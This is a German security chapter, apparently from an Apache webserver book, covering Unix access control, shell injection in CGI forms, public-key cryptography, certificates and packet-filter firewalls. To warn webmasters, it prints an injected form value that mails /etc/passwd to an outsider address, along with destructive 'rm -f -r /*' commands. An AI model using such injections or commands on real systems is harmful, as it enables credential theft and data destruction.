Sicherheit. FirstLeft. Max. Linie. Max. Linie KAPITEL. Kapitel

Größe: px
Ab Seite anzeigen:

Download "Sicherheit. FirstLeft. Max. Linie. Max. Linie KAPITEL. Kapitel"

Transkript

1 FirstLeft. Kapitel KAPITEL Sicherheit Der Betrieb eines Webservers wirft verschiedene sicherheitsrelevante Fragen auf. Hier wollen wir uns diese Fragen etwas allgemeiner ansehen, später gehen wir dann detailliert auf den notwendigen Code ein. Der Gedanke, unbefugte Personen auf unserem Computer zu finden, macht uns ebenso viel Angst wie der Gedanke, unbefugte Personen in unserem Haus vorzufinden. Üblicherweise ist ein Desktop-PC recht sicher. Ein Eindringling müsste sich physisch Zugang zu unserem Heim oder zu unserem Büro verschaffen, um an die Informationen zu gelangen oder sie zu beschädigen. Sobald Sie den Rechner aber mit einer Telefonleitung verbinden, ist es so, als würden Sie in die Nachbarschaft von 50 Millionen Menschen ziehen (von denen nicht alle vertrauenswürdig sind), Ihre Haustür aushängen und ausgehen, ohne das Licht auszumachen, während die Kinder im Bett liegen. Eine umfassende Darstellung des Themas Computersicherheit würde eine Bibliothek füllen. Der Kernpunkt besteht aber darin, dass wir es Fremden unmöglich machen wollen, unsere Daten zu kopieren, zu verändern oder zu löschen. Wir wollen auch unterbinden, dass Fremde ohne unsere Zustimmung irgendwelche Programme auf unseren Rechnern ausführen. Fast ebenso wichtig ist, dass wir verhindern wollen, dass unsere Freunde und legitime Benutzer Fehler machen, deren Konsequenzen ebenso schwerwiegend sein können wie mutwilliger Vandalismus. So könnten sie zum Beispiel den folgenden Befehl ausführen: rm -f -r * Damit würden sie alle ihre Daten und Unterverzeichnisse löschen, wären aber nicht in der Lage, diese drastische Aktion in einem Bereich auszuführen, der jemand anderem gehört. Natürlich hofft man, dass niemand so einen Fehler begeht, aber auch weniger leicht zu erkennende Fehler können genauso fatale Folgen haben. Soweit es den Systemdesigner betrifft, gibt es kaum einen Unterschied zwischen verbrecherischer und fahrlässiger Ignoranz. Gegen beide müssen wir uns schützen. 216 Kapitel 11: Sicherheit

2 Rechts Wir betrachten die grundlegenden Sicherheitsvorkehrungen, die bei einem System mit einer Reihe von Terminals (die von 2 bis reichen können) verwendet werden, und betrachten dann, wie man das auf einen Webserver übertragen kann. Wir gehen davon aus, dass Sie mit einem ernsthaften Betriebssystem wie Unix arbeiten. Wir gehen in diesem Kapitel nicht weiter auf Win32 ein, obwohl Apache auf diesem Betriebssystem läuft. Unserer Ansicht nach sollten Sie nicht mit Win32 arbeiten, wenn Sicherheit ein Thema für Sie ist. Wir wollen damit nicht sagen, dass Win32 keine Sicherheit bietet, sie ist aber nur unzureichend dokumentiert, wird von nur sehr wenigen Leuten verstanden und laufend durch Bugs und dubiose Praktiken (zum Beispiel durch die Befürwortung von ActiveX-Downloads über das Web) unterminiert. Die grundlegende Vorstellung von Sicherheit sieht bei einem normalen Unix so aus, dass jede Operation am Computer durch eine bekannte Person vorgenommen wird, die für ihre Handlungen zur Verantwortung gezogen werden kann. Wer den Computer nutzen möchte, muss sich anmelden (einloggen), damit der Computer weiß, wer er oder sie ist. Jeder Benutzer identifiziert sich durch ein eindeutiges Passwort, das in einer Sicherheitsdatenbank überprüft wird, die vom Administrator gepflegt wird. (Immer häufiger, weil das sicherer ist, wird dies auch durch Prüfung des privaten Teils eines Public/Private- Schlüsselpaares erreicht.) Nach dem Login wird jede Person einer Gruppe von Leuten mit den gleichen Sicherheitsprivilegien zugeordnet. Bei einem wirklich sicheren System kann jede Aktion des Benutzers protokolliert werden. Jedes Programm und alle Datendateien eines Rechners gehören in eine bestimmte Sicherheitsgruppe. Der Effekt des Sicherheitssystems ist also, dass ein Benutzer nur ein Programm ausführen kann, das seiner Sicherheitsgruppe zur Verfügung steht, und dieses Programm kann nur auf Dateien zugreifen, die ebenfalls der Gruppe des Benutzers zur Verfügung stehen. Auf diese Weise können wir verhindern, dass die Buchhaltungsmitarbeiter an den technischen Zeichnungen herumfummeln und dass die Vertriebsmitarbeiter in den Buchaltungsbereich vordringen, um ihre Provisionen ein wenig aufzupäppeln. Natürlich muss es jemanden geben, der das Recht hat, alles zu ändern. Anderenfalls könnte das System gar nicht erst eingerichtet werden. Diese Person ist der Superuser, der sich als root einloggt und ein supergeheimes Passwort verwendet, das in großen Buchstaben an der Wand über der Systemconsole geschrieben steht. Er ist unentbehrlich, aber aufgrund seiner unglaublichen Macht ist er auch eine sehr beunruhigende Person. Wenn sich ein Feind erfolgreich als diese Person ausgeben kann, haben Sie ein echtes Problem. Und das ist natürlich genau das Ziel der Wölfe: mit Superuser-Privilegien in den Rechner einzudringen, um jedes gewünschte Programm ausführen zu können. Schlägt das fehl, möchte der Eindringling wenigstens Privilegien besitzen, die über den ihm eigentlich zustehenden Rechten stehen. Wenn ihm das gelingt, kann er möglicherweise Daten löschen, Dateien lesen, die er nicht lesen sollte, und Passwörter für andere, wertvollere Systeme ausspähen. Unsere Aufgabe besteht darin, dies zu verhindern. Sicherheit 217

3 Interne und externe Benutzer Wie gesagt, bestehen Sicherheitsvorkehrungen bei den meisten ernsthaften Betriebssystemen (auch Unix) darin, die Fähigkeit des Benutzers einzuschränken, bestimmte Operationen durchführen zu können. Die genauen Details sind unwichtig, aber wenn wir dieses Prinzip auf einen Webserver anwenden, müssen wir entscheiden, wer die Benutzer des Webservers in Hinblick auf die Sicherheit des dahinter liegenden Systems sind. Wenn wir die Sicherheit des Webservers betrachten, müssen wir erkennen, dass es grundsätzlich zwei Arten von Benutzern gibt: interne und externe. Die internen Benutzer sind die innerhalb der Organisation, der der Server gehört (oder zumindest die Benutzer, von denen die Eigentümer möchten, dass sie den Serverinhalt aktualisieren können). Die externen Benutzer sind der Rest des Internet. Nun gibt es zwischen diesen beiden Extremen natürlich noch viele Zwischenstufen, aber wir versuchen hier, den Unterschied zwischen solchen Benutzern deutlich zu machen, die den HTTP- Server nur zum Betrachten von Seiten verwenden dürfen (den externen Benutzern), und denen, denen ein umfassender Zugriff auf den Webserver erlaubt ist (den internen Benutzern). Wir müssen die Sicherheit für beide Gruppen betrachten, aber die externen Benutzer bereiten uns größere Sorgen und müssen daher strenger kontrolliert werden. Die internen Benutzer sind nicht notwendigerweise nettere Menschen und machen auch nicht unbedingt weniger Unfug. In mancherlei Hinsicht machen sie wahrscheinlich mehr Ärger, haben ein Motiv und die nötige Sachkenntnis, aber um es mal so zu sagen sie wissen auch, wer das Gehalt überweist. Die externen Benutzer befinden sich üblicherweise außerhalb unserer Reichweite. Im Wesentlichen erlauben wir durch eine Verbindung zum Internet jedem auf der Welt, etwas auf unserem Server einzugeben. Das ist eine alarmierende Vorstellung: Wir wollen die Benutzer nur einen sehr kleinen Bereich sicherer Dinge tun lassen und sicherstellen, dass sie außerhalb dieses Bereichs nichts tun können. Das hat eine Reihe von Konsequenzen: Externe Benutzer dürfen nur in der Lage sein, auf von uns festgelegte Dateien und Programme zuzugreifen. Der Server darf nicht anfällig für verdeckte Angriffe sein. Hierzu gehören beispielsweise Requests mit sehr langen Dateinamen (die bösen Jungs hoffen, mit einem langen Namen einen Puffer fester Länge zum Überlaufen zu bringen und damit den Stack zu beschädigen) oder mit Zeichen wie!, # oder / im Seitennamen, um so einen Teil des Strings vom Betriebssystem des Servers als Befehl ausführen zu lassen. Diese Szenarien lassen sich nur durch sorgfältige Programmierung vermeiden. Apaches Ansatz für das erste Problem besteht darin, Puffer fester Länge nur für Daten fester Länge zu verwenden. 1 Das hört sich einfach an, verlangt aber ein wirklich gewissen- 1 Pufferüberläufe sind die bei weitem häufigste Ursache von Sicherheitslücken im Internet und sind nicht nur auf Webserver beschränkt. Links 218 Kapitel 11: Sicherheit

4 Rechts haftes Arbeiten. Die anderen Probleme werden von Fall zu Fall behandelt: manchmal, nachdem eine Sicherheitslücke erkannt wurde, häufig aber auch durch die sorgfältigen Überlegungen der Apache-Programmierer. Unglücklicherweise arbeitet Unix gegen uns. Erstens ist der Standard-HTTP-Port 80. Nur der Superuser kann die Bindung zu diesem Port herstellen (ein historischer Versuch von Sicherheit, der für Maschinen geeignet ist, bei denen nicht unbedingt vertrauenswürdige Personen einen Login besitzen eine Situation, die für einen modernen sicheren Webserver wohl kaum zutrifft), weshalb der Server zumindest als Superuser hochfahren muss: Das ist genau das, was wir nicht wollen. 2 Ein weiteres Problem sind die verschiedenen Unix-Shells mit ihrer reichhaltigen Syntax, die voll von cleveren Tricks von den bösen Jungs genutzt werden können, um unerwartete oder unerwünschte Dinge zu tun. Win32 ist gegen solche Probleme bei weitem nicht immun, weil die einzige verfügbare Shell (COMMAND.COM ) so leistungsschwach ist, dass sie manchmal durch Unix-Shells ersetzt wird. Nehmen wir zum Beispiel ein Formular, das wir dem Benutzer in einem HTML-Dokument zur Verfügung stellen. Der Computer des Benutzers interpretiert das Skript und bringt ein Formular auf den Schirm. Der Benutzer füllt das Formular aus und drückt den Submit-Button. Sein Rechner sendet das Formular an den Server zurück, wobei über die URL ein Skript aufgerufen wird, das den Inhalt des Formulars an eine Datei anhängt, die wir später einsehen können. Dieses Skript könnte beispielsweise die folgende Zeile enthalten: echo "You have sent the following message: $MESSAGE" Unsere Absicht ist es, über unseren Rechner eine Nachricht an den Benutzer zurückzuschicken, in der seine Nachricht an uns (im Textstring $MESSAGE) noch einmal wiederholt wird. Nun könnte uns ein schlauer oder böser externer Benutzer folgende $MESSAGE schicken: `mail wolf@lair.com < /etc/passwd` Weil Backquotes von der Shell als eingebettete Befehle interpretiert werden, hat diese Nachricht den höchst alarmierenden Effekt, dass unsere supergeheime Passwortdatei an einen völlig Fremden verschickt wird. Oder er könnte, weniger phantasievoll, aber genauso boshaft, Folgendes schicken: `rm -f -r /*` Dadurch würde das immer währende Problem einer vollen Festplatte kurzfristig behoben. 2 Hier haben wir den seltenen Fall, dass Win32 wirklich besser ist als Unix. Wir müssen bei Win32 kein Superuser sein, müssen allerdings das Recht haben, Dienste zu starten. Interne und externe Benutzer 219

5 Binäre Signaturen und virtuelles Geld Auf lange Sicht gesehen, glauben wir, dass virtuelles oder binäres Geld der wichtigste Anwendungsfall der Kryptographie sein wird. Aus anderer Perspektive könnte das die Möglichkeit digitaler Signaturen, und damit elektronischer Schecks, bedeuten. Auf den ersten Blick erscheint das unmöglich. Die Befugnis zur Ausstellung von Dokumenten wie Schecks wird durch eine Unterschrift (Signatur) nachgewiesen. Dieses System ist einfach (und offen für Betrügereien) und basiert zurzeit noch auf Papier. Wir könnten das direkt auf das Web übertragen, indem wir die Unterschrift einer Person einscannen und diesen Scan zur Validierung ihrer Dokumente verwenden. Allerdings hat sich jegliche mit dieser Unterschrift verbundene Sicherheit in Luft aufgelöst. Ein Fälscher muss einfach nur das Bitmuster kopieren, aus dem diese Signatur besteht. Nachdem das Bitmuster gespeichert wurde, hängt der Fälscher dieses Muster bei jedem Einkaufsbummel an seine Bestellung an, und der kostenlosen Selbstbedienung steht nichts mehr im Wege. Bei der digitalen Signatur werden bestimmte Aktionen mit den von der anderen Seite gelieferten Daten durchgeführt, die nur von Ihnen durchgeführt werden können. Auf diese Weise ist sichergestellt, dass Sie wirklich der sind, für den Sie sich ausgeben. Die möglichen Aktionen wollen wir uns nachfolgend näher ansehen. Die Ideen der so genannten Public Key (PK) Encryption sind mittlerweile gut bekannt, weshalb wir die wichtigen Punkte nur kurz erwähnen wollen: Sie besitzen zwei Schlüssel (Keys): einen Schlüssel (der öffentliche Schlüssel oder Public Key), der Nachrichten verschlüsselt, und einen Schlüssel (Ihr privater Schlüssel), mit dem durch Ihren öffentlichen Schlüssel codierte Nachrichten entschlüsselt werden können (und umgekehrt). Im Gegensatz zur konventionellen Ver- und Entschlüsselung können Sie sowohl mit dem privaten als auch mit dem öffentlichen Schlüssel verschlüsseln und mit dem jeweils anderen entschlüsseln. Den öffentlichen Schlüssel geben Sie jedem, der danach fragt, während Ihr privater Schlüssel geheim bleibt. Weil die zur Ver- und Entschlüsselung verwendeten Keys nicht gleich sind, nennt man das System auch Asymmetric Key Encryption. Die vorhin erwähnte»aktion«, das heißt nachzuweisen, dass Sie der sind, für den Sie sich ausgeben, besteht also darin, irgendeinen Text mit Hilfe Ihres privaten Schlüssels zu verschlüsseln. Jeder kann ihn dann mit Hilfe Ihres öffentlichen Schlüssels entschlüsseln. Ergibt die Entschlüsselung einen vernünftigen Text, stammt dieser von Ihnen, andernfalls nicht. Lassen Sie uns diese Technik auf einfache Herzensangelegenheiten anwenden. Sie treten einer Single-Newsgruppe bei, in der Leute ihre Vorzüge und ihre Bereitschaft zu einem Treffen mit ähnlich romantisch veranlagten Personen bekannt geben. Die Ihnen sympatisch erscheinende Person veröffentlicht ihren Public Key am Ende der Nachricht, in der er oder sie seine bzw. ihre Vorzüge anpreist. Sie antworten: Links 220 Kapitel 11: Sicherheit

6 Rechts Ich bin (hier folgt die unwiderstehliche Beschreibung Ihrer selbst). Du findest mich um 00:30 am Schuppen. Mein Herz brennt.. (etc.) Sie verschlüsseln diese Nachricht mit dem Public Key des bzw. der Angebeteten und senden sie. Wer auch immer diese Nachricht sieht oder irgendwo vorfindet, ist nicht in der Lage, den Zeitpunkt Ihres Stelldicheins zu ermitteln. Der oder die Angebetete hingegen kann sie entschlüsseln und Ihnen eine verschlüsselte Antwort zukommen lassen: JA, ja, immer wieder JA! Zur Verschlüsselung wird wieder der private Schlüssel verwendet. Wenn Sie diese Nachricht mit Hilfe des öffentlichen Schlüssels dekodieren können, dann können Sie sicher sein, dass sie von der richtigen Person stammt und nicht von einigen Scherzbolden, die Ihnen den Abend verderben wollen. Nun kann aber jeder, der den öffentlichen Schlüssel besitzt, auch die Antwort entschlüsseln. Ihre wahre Liebe könnte daher die Antwort mit seinem oder ihrem privaten Schlüssel codieren (um zu beweisen, dass die Nachricht wirklich von ihm oder ihr stammt) und sie danach noch einmal mit Ihrem öffentlichen Schlüssel codieren, um zu verhindern, dass jemand anders sie lesen kann. Sie entschlüsseln sie dann zweimal, und alles ist gut. Die Module zur Ver- und Entschlüsselung haben eine ganz entscheidende Eigenschaft: Obwohl Sie den Schlüssel zur Verschlüsselung in der Hand halten, können Sie daraus nicht den zur Verschlüsselung notwendigen Schlüssel ableiten (zugegeben, Sie können, aber nur nach mehreren Jahren Rechenarbeit). Das liegt daran, dass die Verschlüsselung mit einer sehr großen Zahl (dem Schlüssel) erfolgt, während die Entschlüsselung die Kenntnis der Primfaktoren verlangt, die nur sehr schwer zu bestimmen sind. Die Leistungsfähigkeit der PK-Verschlüsselung wird an der Länge des Schlüssels gemessen, weil das die Zeitdauer beeinflusst, die zur Berechnung der Primfaktoren notwendig ist. Die bösen Jungs (beachten Sie die zweite Fußnote in Kapitel 1) und seltsamerweise die amerikanische Regierung würden es gerne sehen, wenn die Leute nur kurze Schlüssel verwenden, weil sie so alle Nachrichten knacken können, die sie knacken wollen. Leute, die das nicht für eine gute Idee halten, verwenden einen langen Schlüssel, damit ihre Nachrichten nicht geknackt werden können. Die einzige praktische Einschränkung für längere Schlüssel besteht darin, dass die Konstruktion und die Summenberechnung immer länger dauert, je länger der Schlüssel ist. Ein Experiment in Sachen»Knacken eines PK-Schlüssels«wurde 1994 mit 600 Freiwilligen über das Internet durchgeführt. Es waren 8 Monate und 1600 Computer erforderlich, um die Primfaktorzerlegung einer 429-Bit-Zahl (siehe PGP: Pretty Good Privacy von Simson Garfinkel [O Reilly, 1994]) durchzuführen. Diese Zeit verdoppelt sich etwa, sobald 10 weitere Bits hinzukommen. Die gleiche Gruppe würde für einen 1024-Bit- Schlüssel Abermillionen Jahre brauchen. Irgendwas muss sich bis zum Jahr 2000 geändert haben, als ein schwedisches Team US-Dollar von Simm Singh, dem Autor von The Code Book (Anchor Books, 2000), für das Lesen einer mit einem 512-Bit-Schlüssel verschlüsselten Nachricht gewann. Sie benötigten dazu 70 Jahre PC-Zeit. Binäre Signaturen und virtuelles Geld 221

7 Allerdings kann ein Durchbruch in der Algebra das Ganze über Nacht ändern. Auch sagen Verfechter der Quanten-Computer voraus, dass diese (bislang nur konzeptionell existierenden) Rechner so viel schneller sein werden, dass 1024-Bit-Schlüssel in einem auch für Menschen absehbaren Zeitraum zu knacken sein werden. Wir müssen uns daran erinnern, dass vollkommene Sicherheit (egal ob bei der Verschlüsselung, Safes, Abwehr-Rakten, Burgen, Festungen...) ein nicht zu erreichendes Ziel darstellt. Wir können bestenfalls den Angreifer so lange aufhalten, dass er die Daten nicht mehr haben will, das Interesse verliert, erwischt wird oder an Altersschwäche stirbt. Für den Augenblick erfüllt die PK-Verschlüsselungsmethode aber einige der hoch gesteckten Anforderungen der Kryptographie-Gemeinde: Sie ist (soweit wir wissen) in realistischen Zeiträumen nicht zu knacken. Sie ist portabel. Der öffentliche Schlüssel eines Benutzers muss nur 128 Bytes lang 3 sein und kann durchaus kürzer sein. Jeder kann verschlüsseln, aber nur der Besitzer des privaten Schlüssels kann wieder entschlüsseln. Anders ausgedrückt bedeutet das: Wenn ein privater Schlüssel das Dokument verschlüsselt und der zugehörige öffentliche Schlüssel wieder Klartext liefert, kann man sicher sein, dass die richtige Person das Dokument signiert hat. Die Entdecker der Public-Key-Verschlüsselung müssen geglaubt haben, es sei Weihnachten, als sie das alles erkannten. Andererseits ist PK eine der wenigen Verschlüsselungsmethoden, die ohne Datenverkehr geknackt werden kann. Der klassische Weg zum Entschlüsseln von Codes besteht darin, ausreichend viele Nachrichten zu sammeln (was für sich genommen schon schwierig genug ist, möglicherweise sogar unmöglich, wenn der Benutzer vorsichtig ist und nur wenige Nachrichten sendet). Aus den Regelmäßigkeiten des zugrunde liegenden Textes arbeitet man sich dann zum Schlüssel zurück. Mit sehr viel Hilfe von dieser Seite konnten so die deutschen Enigma-Codes während des 2. Weltkriegs geknackt werden. Bei der PK-Methode ist zum Knacken des Codes keine Datensammlung notwendig. Sie müssen»nur«die Primfaktoren des öffentlichen Schlüssels berechnen. In dieser Hinsicht ist diese Methode also einmalig, andererseits ist das Ganze, wie wir eben gesehen haben, nicht ganz so einfach. Mit diesen beiden Zahlen, den öffentlichen und privaten Schlüsseln, sind die beiden Module austauschbar: Neben der normalen Arbeitsweise können Sie auch einen Klartext nehmen, ihn mit dem Entschlüsselungsmodul»entschlüsseln«und ihn dann mit dem Verschlüsselungsmodul»verschlüsseln«, um wieder an den eigentlichen Text zu gelangen. Der Punkt ist der, dass Sie nun eine Nachricht mit Ihrem privaten Schlüssel verschlüsseln und an jeden schicken können, der Ihren öffentlichen Schlüssel besitzt. Die Tatsache, dass beim Entschlüsseln lesbarer Text entsteht, bestätigt, dass die Nachricht von Ihnen stammt: Es handelt sich um eine nicht zu fälschende elektronische Signatur. 3 Manche Leute sagen, man sollte mit längeren Schlüsseln arbeiten, um wirklich sicher zu sein. Keiner, den wir kennen, befürwortet bislang aber mehr als 4096 Bits (512 Bytes). Links 222 Kapitel 11: Sicherheit

8 Rechts Diese interessante Tatsache ist sehr nützlich, wenn es um den Austausch von Geld über das Web geht. Sie eröffnen ein Konto bei einer Firma wie American Express. Sie möchten beim Verlag eine Kopie dieses exzellenten Buches erwerben und senden daher eine verschlüsselte Nachricht an Amex mit der Bitte, Ihr Konto zu belasten und den Betrag der Firma O Reilly gutzuschreiben. Amex kann das guten Gewissens tun (vorausgesetzt, Sie waren vernünftig und haben Ihren privaten Schlüssel nicht öffentlich gemacht), weil Sie die einzige Person sind, die diese Nachricht gesendet haben kann. E-Commerce ist (natürlich) wesentlich komplizierter, funktioniert aber grundsätzlich genauso. Eine der Schwierigkeiten liegt darin begründet, dass PK mit sehr großen Zahlen rechnen muss und daher recht langsam ist. Die oben erwähnten Liebenden könnten die gesamten Nachrichten auf diese Weise verschlüsselt haben, hätten sich dabei aber wahrscheinlich sehr gelangweilt und in der Zwischenzeit wohl jemand anderes geheiratet. Im richtigen Leben werden Nachrichten über ein schnelles, aber altmodisches System verschlüsselt, das auf einem einzelnen geheimen Schlüssel basiert, den beide Seiten kennen. Da der Schlüssel kurz ist (zum Beispiel 128 Bits oder 16 Zeichen), ist der Autausch schnell. Der Schlüssel wird dann zur Ver- und Entschlüsselung der Nachricht mit einem unterschiedlichen Algorithmus, wahrscheinlich dem International Data Encryption Algorithm (IDEA) oder dem Data Encryption Standard (DES), verwendet. So generiert beispielsweise das Paket Pretty Good Privacy einen Schlüssel und überträgt diesen mit PK. Danach wird IDEA zur Ver- und Entschlüsselung der eigentlichen Nachricht verwendet. Die Technik ist vorhanden, um diese Art der Verschlüsselung so sicher zu machen wie PK: Die einzige Möglichkeit, ein gutes System anzugreifen, besteht darin, nacheinander jeden möglichen Schlüssel auszuprobieren. Dieser Schlüssel muss nicht übermäßig lang sein, um diesen Prozess so lange dauern zu lassen, dass es praktisch nicht mehr sinnvoll ist. Wenn Sie beispielsweise jede Möglichkeit eines 128-Bit-Schlüssels mit einer Rate von einer Million Prüfungen pro Sekunde durchspielen, könnte es Jahre dauern, bis Sie den richtigen finden. Das entspricht lediglich mal dem Alter des Universums, ist aber doch eine recht lange Zeit. Zertifikate»Niemand ist eine Insel«mahnte uns John Donne. Wir praktizieren Kryptographie nicht als Selbstzweck, das hätte offensichtlich keinerlei Sinn. Selbst in der einfachen Situation des Spions und seines Auftraggebers ist es wichtig, sich sicher zu sein, dass man mit der richtigen Person redet. Viele Geheimdienstoperationen basieren darauf, dass man den Spion abfängt und ihn durch eigene Leute ersetzt, um den Feind mit falschen Informationen zu versorgen. Das kann für den Führungsoffizier ärgerlich und gefährlich sein, weshalb er seinen Spionen häufig kleine Tricks beibringt, von denen er hofft, dass sie vom Gegner übersehen werden und dass sich die Gegner so selbst verraten. 4 4 Leo Marks, Between Silk and Cyanide, Free Press, Zertifikate 223

9 In der größeren kryptographischen Welt des Web ist das Problem ebenso akut. Wenn wir eine Reihe von Karten bei bestellen, wollen wir sicher sein, dass die unser Geld akzeptierende Firma die Postkarten-Verkäufer sind und nicht irgendein Eindringling. Ebenso will Butterthlies, Inc. sicher sein, dass wir diejenigen sind, die wir vorgeben zu sein, und dass wir irgendein Konto besitzen, vom dem die herrlichen Angebote beglichen werden können. Diese Probleme werden bis zu einem gewissen Punkt durch die Idee eines Zertifikats gelöst. Ein Zertifikat ist ein elektronisches Dokument, das durch ein respektables Unternehmen oder eine respektable Person unterzeichnet wird, das bzw. die man als»zertifizierungsstelle«(certification authority (CA)) bezeichnet.»unterzeichnen«bedeutet hier:»mit einem privaten Schlüssel verschlüsseln«. Dieses Dokument enthält den öffentlichen Schlüssel des Besitzers sowie einige Informationen über ihn: Name, -Adresse, Unternehmen und so weiter (siehe den Abschnitt»Ein Test-Zertifikat erzeugen«später in diesem Kapitel). Sie erhalten dieses Dokument, indem Sie ein Zertifizierungsformular ausfüllen, das eine CA anbietet. Nachdem Sie die CA mit Silber überhäuft und irgendeine Form der Prüfung durchlaufen haben, erhalten Sie die entsprechenden Daten. In Zukunft könnte die CA selbst ein Zertifikat von einer übergeordneten CA erhalten und so weiter, bis hin zu einer CA, die so erhaben und so unglaublich respektabel ist, dass sie ihr eigenes Zertifikat unterzeichnen kann. (Da eine Gottheit körperlich nicht anwesend ist, muss das wohl ein Mensch übernehmen.) Dieses Zertifikat ist als Root-Zertifikat bekannt. Bei einem guten Root-Zertifikat ist der öffentliche Schlüssel weit verbreitet und sicher verfügbar. Im Augenblick verwendet so ziemlich jede CA ein selbst unterzeichnetes Zertifikat, und selbstverständlich machen das alle öffentlichen CAs. Solange bezüglich des Umgangs und des Vertrauens zu Zertifikaten aus zweiter Hand nichts wirklich Grundlegendes erreicht wurde, gibt es keine andere Möglichkeit. Nur weil Sie Fred vertrauen, ein Zertifikat für Bill auszustellen, bedeutet das ja nun nicht, dass Sie auch den von Bill ausgestellten Zertifikaten vertrauen müssen. Ein anderer Ansatz besteht darin, ein Netzwerk verifizierter Zertifikate ein so genanntes Web of Trust (WOT) von Grund auf aufzubauen. Dabei wird mit Leuten begonnen, die den Begründern direkt bekannt sind, die dann wiederum für einen größeren Kreis bürgen und so weiter. Das ursprüngliche Schema wurde als Teil von PGP vorgeschlagen. Einen einführenden Artikel finden Sie unter Die Datenbank der PGP-Trusties ist über das Web verteilt, was die Verifikation nicht gerade vereinfacht. Thawte verwendet eine andere Version, bei der die Datenbank von dem Unternehmen verwaltet wird siehe contents.html. Diese Ansätze sind interessant, werfen aber mindestens so viele Fragen zur Natur des Vertrauens (und der Fähigkeit anderer, Entscheidungen über die Vertrauenswürdigkeit zu treffen) auf, wie sie lösen. Soweit wir wissen, spielen WOTs für den Han- Links 224 Kapitel 11: Sicherheit

10 Rechts del im Web keine bedeutende Rolle, sind im Bereich der -Sicherheit aber weit verbreitet. 5 Wenn Sie mit jemandem im Web Geschäfte machen, tauschen Sie Zertifikate aus (oder prüfen zumindest das Server-Zertifikat), die Sie von einer CA (einige werden später noch aufgeführt) erhalten haben. Sichere Transaktionen verlangen daher, dass die Parteien in der Lage sind, die Zertifikate des jeweils anderen zu überprüfen. Um ein Zertifikat überprüfen zu können, benötigen Sie den öffentlichen Schlüssel der Stelle, die das Zertifikat ausgestellt hat. Stehen Sie einem Zertifikat einer unbekannten CA gegenüber, gibt Ihr Browser bedrohliche Warnungen aus allerdings kennen die wichtigsten Browser die wesentlichen CAs, weshalb diese Situation in der Praxis nur selten auftritt. Sobald die ganze Zertifikatsstruktur einmal steht, wird es eine Kette von Zertifikaten geben, die über größere Organisationen zu einigen wenigen Root-CAs zurückführen, die wahrscheinlich so groß und beeindruckend sind wie Telefongesellschaften oder Banken, so dass an ihrer Korrektheit keine Zweifel bestehen. Die Frage der Zertifikatsketten ist die erste Stufe in der Formalisierung unserer Vorstellungen von Vertrauen in geschäftlichen und persönlichen Finanzangelegenheiten. Seit der Gründung von Banken im 13. Jahrhundert haben wir uns an die Vorstellung gewöhnt, dass wir unser schwer verdientes Geld der fremden Person hinter dem Bankschalter anvertrauen können. Im Internet wird nun aber die Beruhigung durch die teuren Gebäude und die beeindruckende Einrichtung fehlen. Diese wird zum Teil durch Zertifikatsketten ersetzt werden. Weil aber eine Person ein Zertifikat besitzt, bedeutet das noch lange nicht, dass Sie ihr uneingeschränkt vertrauen können. LocalBank kann durchaus ein Zertifikat von der MegaBank besitzen und die wieder von der Bundesbank und diese wiederum von irgendeiner Gottheit des CA-Geschäfts. LocalBank kann ihrem Hausmeister ein Zertifikat ausstellen, was aber nur bedeutet, dass er wahrscheinlich der Hausmeister ist, der er vorgibt zu sein. Sie würden ihm daraufhin aber sicher nicht automatisch die Berechtigung geben wollen, Ihr Konto mit Hausreinigungsrechnungen zu belasten. Sie würden sicher niemandem vertrauen, der kein Zertifikat besitzt. Inwieweit Sie jemandem aber vertrauen würden, hängt von den so genannten Policies ab, die von seinem Arbeitgeber und ihm Vertrauen bescheinigenden Stellen ausgegeben wurden. Das Ganze würde sich noch durch Ihre eigenen Policies ändern, über die die meisten Leute nicht viel nachdenken müssen. Das ganze Thema ist extrem zeitaufwändig und wird uns wahrscheinlich zu Tode langweilen, bevor sich alles eingespielt hat. Einen guten Überblick zum Thema finden Sie unter ssl_intro.html. Eine etwas zynischere Betrachtung eines der Autoren finden Sie unter Siehe auch Security Engineering von Ross Anderson (Wiley, 2001). 5 Obwohl einer von uns (BL) unlängst in diesem Bereich einiges an Arbeit geleistet hat: siehe aldigital.co.uk/. Zertifikate 225

11 Firewalls Es ist allgemein bekannt, dass im Web Gestalten herumgeistern, die nichts anderes im Sinn haben, als Ihre Site durcheinanderzubringen. Viele konservative Leute halten eine Firewall für die richtige Lösung, um diese Menschen aufzuhalten. Die Aufgabe einer Firewall besteht darin, Zugriffe aus dem Internet auf Rechner oder Dienste innerhalb Ihres LANs/WANs zu verhindern. Eine andere Aufgabe könnte, abhängig von Ihrer Umgebung, darin bestehen zu verhindern, dass die Benutzer Ihres LANs sich im Internet frei bewegen können. Der Begriff Firewall steht nicht für irgendeinen bestimmten Standard. Es gibt eine Vielzahl von Ansätzen, um die oben genannten Ziele zu erreichen. Die beiden Extreme stellen wir Ihnen in diesem Abschnitt vor; gleichzeitig sind viele Ansätze zwischen diesen Extremen möglich. Das Ganze ist ein sehr großer Themenkomplex. Wir versuchen hier nur, den Webmaster über vorhandene Probleme zu informieren, und wollen einige Möglichkeiten skizzieren, um diese zu lösen. Weiterführende Informationen zu diesem Thema finden Sie in Einrichten von Internet Firewalls von D. Brent Chapman und Elizabeth D. Zwicky (O Reilly Verlag). Paketfilter Diese Technik ist die einfachste Form einer Firewall. Dabei werden aus dem Internet eingehende Pakete auf bestimmte sichere Ports beschränkt. Paketfilternde Firewalls werden üblicherweise über Filter implementiert, die in Ihrem Internet-Router vorhanden sind. Das bedeutet, dass auf Ports unter 1024 kein Zugriff gewährt wird. Die Ausnahme bilden dabei bestimmte Ports für»sichere«dienste wie SMTP, NNTP, DNS, FTP und HTTP. Der Vorteil liegt darin, dass der Zugriff auf potenziell gefährliche Dienste wie die folgenden verweigert wird: finger Liefert eine Liste der eingeloggten Benutzer und teilt den bösen Jungs im weiteren Verlauf die Hälfte von dem mit, was sie benötigen, um sich selbst einzuloggen. exec Erlaubt es den bösen Jungs, Programme entfernt auszuführen. TFTP Ein nahezu sicherheitsfreies Protokoll zum Dateitransfer. Die Möglichkeiten sind furchtbar! Die Vorteile von Paketfiltern sind Schnelligkeit und Einfachheit. Es gibt aber zumindest zwei Nachteile: Selbst Standarddienste können Bugs enthalten, die einen Zugriff ermöglichen. Sobald in einen Rechner eingedrungen werden konnte, ist Ihr gesamtes Netzwerk offen. Das furchtbar komplizierte Programm sendmail ist ein schönes Beispiel für einen Service, der vielen Crackern über Jahre hinweg geholfen hat. Links 226 Kapitel 11: Sicherheit

FTP-Leitfaden RZ. Benutzerleitfaden

